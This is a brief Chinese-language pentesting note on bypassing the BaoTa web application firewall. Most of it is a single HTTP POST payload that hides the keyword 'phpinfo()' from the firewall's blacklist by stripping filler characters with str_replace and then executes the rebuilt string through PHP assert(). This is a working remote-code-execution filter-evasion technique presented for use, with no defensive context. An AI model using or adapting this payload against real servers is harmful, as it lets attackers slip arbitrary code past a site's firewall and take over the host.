【笔记】宝塔WAF绕过

前言

宝塔WAF绕过

RCE检测绕过

  • 防止RCE中出现黑名单中的关键字
request
1
2
3
4
POST /
Content-Type: application/x-www-form-urlencoded

x=$x=str_replace('x','','pxhxpxixnxfxox(x)');assert($x);

完成